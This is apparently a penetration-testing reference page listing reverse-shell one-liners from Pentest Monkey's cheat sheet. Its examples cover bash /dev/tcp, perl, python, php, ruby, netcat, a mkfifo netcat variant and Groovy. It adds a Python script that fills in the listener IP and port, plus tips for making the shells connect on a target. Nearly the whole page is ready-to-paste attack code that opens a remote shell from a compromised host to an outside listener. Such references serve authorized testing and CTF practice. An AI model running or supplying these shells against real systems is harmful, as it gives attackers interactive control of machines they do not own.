Reverse Shells

All of the following reverse shells are originally from Pentest Monkey's reverse shell cheat sheet. The purpose of this page is to build those reference one-liners with the listener IP address and port you supply, so they can be copied and pasted without editing. Each command connects from the compromised host back to that address, so a listener must already be waiting on that port on your machine; a wrong address or port simply results in no connection.
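As an added example (not part of the original page or of Pentest Monkey's material), here is a small local helper that does the same substitution the page does, but validates the target first: the address must be IPv4, because the perl and python one-liners use inet_aton/AF_INET, and the port must be in range. The template subset, the 10.10.14.5:4444 default and the function names are the example's own assumptions.

```python
"""Render the page's reverse-shell one-liners for a chosen listener IP and port.

Added example, not the page's own code: validates the target before filling in
the {{USER_IP}} / {{USER_PORT}} placeholders so a typo is caught locally rather
than by a shell that silently fails to connect back.
"""
import ipaddress

# A subset of the page's templates, copied with their original placeholders.
TEMPLATES = {
    "bash": "bash -i >& /dev/tcp/{{USER_IP}}/{{USER_PORT}} 0>&1",
    "netcat": "nc -e /bin/sh {{USER_IP}} {{USER_PORT}}",
    "netcat-fifo": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
                   "|nc {{USER_IP}} {{USER_PORT}} >/tmp/f",
    "python": "python -c 'import socket,subprocess,os;"
              "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
              's.connect(("{{USER_IP}}",{{USER_PORT}}));'
              "os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);"
              'p=subprocess.call(["/bin/sh","-i"]);\'',
}


def validate_target(ip, port):
    """Return (ip, port) normalised, or raise ValueError.

    IPv4 only: several of the one-liners (perl inet_aton, python AF_INET)
    cannot take an IPv6 address, so refusing it here avoids a confusing failure
    on the target.
    """
    addr = ipaddress.ip_address(str(ip).strip())  # ValueError on junk
    if addr.version != 4:
        raise ValueError(f"IPv4 address required, got {addr}")
    port_num = int(port)  # ValueError on non-numeric input
    if not 1 <= port_num <= 65535:
        raise ValueError(f"port out of range: {port_num}")
    return str(addr), port_num


def is_valid_target(ip, port):
    """Boolean wrapper around validate_target for quick checks."""
    try:
        validate_target(ip, port)
        return True
    except ValueError:
        return False


def render(template, ip, port):
    """Substitute a validated IP/port into one template."""
    addr, port_num = validate_target(ip, port)
    rendered = (template.replace("{{USER_IP}}", addr)
                        .replace("{{USER_PORT}}", str(port_num)))
    if "{{" in rendered:  # guard against a template with an unknown placeholder
        raise ValueError("unreplaced placeholder in template")
    return rendered


def render_all(ip, port):
    """Render every template; returns {name: command}."""
    return {name: render(tmpl, ip, port) for name, tmpl in TEMPLATES.items()}


if __name__ == "__main__":
    import sys
    # Hypothetical default listener; pass IP and port as arguments to override.
    ip, port = sys.argv[1:3] if len(sys.argv) == 3 else ("10.10.14.5", "4444")
    for name, cmd in render_all(ip, port).items():
        print(f"# {name}\n{cmd}\n")
```

Run it with your listener address as the two arguments; invalid input raises before anything is printed, which is the behaviour you want from a generator whose output is pasted into a target you may only get one shot at.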

bash

bash -i >& /dev/tcp/{{USER_IP}}/{{USER_PORT}} 0>&1

Relies on bash's /dev/tcp pseudo-device, so it must be run by bash itself (not sh or dash) and by a bash build that has the feature enabled.

perl

perl -e 'use Socket;$i="{{USER_IP}}";$p={{USER_PORT}};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{{USER_IP}}",{{USER_PORT}}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

The snippet is valid under both Python 2 and Python 3, so substitute python3 for python on hosts that no longer ship a python binary.

php

php -r '$sock=fsockopen("{{USER_IP}}",{{USER_PORT}});exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the new socket is file descriptor 3 in the PHP process; if the process already has other descriptors open the number will be higher, so try 4, 5 or 6 when the shell connects but shows no prompt.

ruby

ruby -rsocket -e'f=TCPSocket.open("{{USER_IP}}",{{USER_PORT}}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

netcat

nc -e /bin/sh {{USER_IP}} {{USER_PORT}}

The -e option only exists in some netcat builds (for example nc.traditional or ncat); the OpenBSD netcat found on many Linux distributions lacks it, in which case use the mkfifo variant below.

netcat (without -e)

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{USER_IP}} {{USER_PORT}} >/tmp/f

Works with any netcat: the named pipe carries the listener's input to the shell while the shell's output is piped back into nc. The fifo is left in /tmp when the shell exits, so remove it once you are done.

java

This snippet is Groovy rather than plain Java: the untyped assignments and the 'as String[]' cast will not compile with javac, and the backslash before $line stops Groovy from interpolating it. Run it wherever Groovy is available, such as a JVM application's Groovy scripting console.

// Spawn bash with a TCP connection on descriptor 5 and feed it lines read from the listener.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/{{USER_IP}}/{{USER_PORT}};cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()